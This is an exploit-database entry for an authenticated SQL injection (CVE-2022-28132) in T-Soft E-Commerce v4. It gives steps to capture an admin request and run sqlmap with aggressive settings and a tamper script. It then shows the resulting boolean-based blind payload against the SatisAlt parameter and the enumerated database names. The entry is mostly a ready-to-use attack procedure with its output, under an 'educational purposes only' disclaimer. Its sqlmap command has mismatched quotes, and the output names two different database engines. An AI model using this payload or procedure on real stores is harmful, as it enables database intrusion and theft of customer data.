Exploits / Vulnerability Discovered : 2022-05-17 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Tsoft ecommerce 4 sqli (authenticated) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: T-Soft E-Commerce 4 - SQLi (Authenticated)
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/TW)
# Software Homepage: https://www.tsoft.com.tr/
# Version : v4
# Tested on: Kali Linux
# Category: WebApp
# Google Dork: N/A
# CVE: 2022-28132
# Date: 18.02.2022
######## Description ###########################################
#
#
#
# Step-1: Login as Admin or with privilage user
# Step-2: Open burp or zap and request the {PoC REQUEST PATH} vulnerable path
# Step-3: Capture the request save as .txt
# Step-4: Run SQLMAP with this command 'sqlmap -r {req.txt} --dbs --level 5 --risk 3 --tamper=space2comment' --random-agent'
# Step-5: Now you're be able to see the dbs for more search 'how to use sqlmap advance'
#
# Impact: Attacker can see the what have in database and it's big impact and attacker can stole datas...
#
#
#
######## Proof of Concept ########################################
=============> RESULTS OF THE SQLMAP <==========================
Parameter: SatisAlt (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: _dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=' AND 1331=1331 AND 'RcAU'='RcAU&SatisUst=&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0¥i=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20
---
back-end DBMS: MySQL 5
available databases [2]:
[*] d25082_db
[*] information_schema
[13:05:31] [INFO] GET parameter 'SatisAlt' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable